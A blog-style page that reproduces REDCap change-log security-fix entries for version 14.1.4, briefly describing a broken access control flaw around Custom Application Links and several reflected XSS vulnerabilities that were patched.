![]() ![]() ![]() ![]() This could be used to trick users into navigating to potentially malicious websites. Only admins should be able to create, modify, and delete Custom Application Links in the Control Center. Medium security fix: A Broken Access Control vulnerability was discovered in which a logged-in user who is not a REDCap administrator could create Custom Application Links and have those open on the left-hand menu for any and all projects in the system.Bug exists in all REDCap versions for the past 10 years. The user must be authenticated into REDCap in order to exploit this. Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the confirmation page displayed for users who have put in specific requests to the REDCap administrator (e.g., requested a project be moved to production) in which a malicious user could potentially exploit it by inserting custom JavaScript in a specially crafted way into the URL. ![]() Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the Alerts & Notifications page in which a malicious user could potentially exploit it by inserting custom JavaScript in a specially crafted way into parameters in certain AJAX requests.The user must be an admin and must be authenticated into REDCap in order to exploit this. Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered in the Database Query Tool in which a malicious user could potentially exploit it by inserting custom JavaScript in a specially crafted way into saved queries on the page.Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the "Importing instrument from the REDCap Shared Library" page in which a malicious user could potentially exploit it by inserting custom JavaScript in a specially crafted way into input elements on the page.REDCap Change Log Version 14.1.4 (released on ) ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |